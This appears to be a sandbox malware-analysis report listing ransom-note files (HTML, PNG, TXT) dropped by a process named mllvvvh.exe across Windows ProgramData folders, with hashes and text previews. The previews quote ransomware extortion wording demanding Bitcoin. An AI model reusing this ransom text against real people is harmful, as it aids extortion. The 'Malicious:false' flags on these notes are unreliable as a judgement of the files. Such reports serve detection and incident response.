                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\SoftwareDistribution\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\SoftwareDistribution\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\SoftwareDistribution\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\USOPrivate\UpdateStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\USOPrivate\UpdateStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\USOPrivate\UpdateStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\USOPrivate\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\USOPrivate\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\USOPrivate\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\USOShared\Logs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\USOShared\Logs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\USOShared\Logs\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\USOShared\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\USOShared\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\USOShared\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\WindowsHolographicDevices\SpatialStore\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\WindowsHolographicDevices\SpatialStore\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\WindowsHolographicDevices\SpatialStore\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\WindowsHolographicDevices\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\WindowsHolographicDevices\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\WindowsHolographicDevices\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
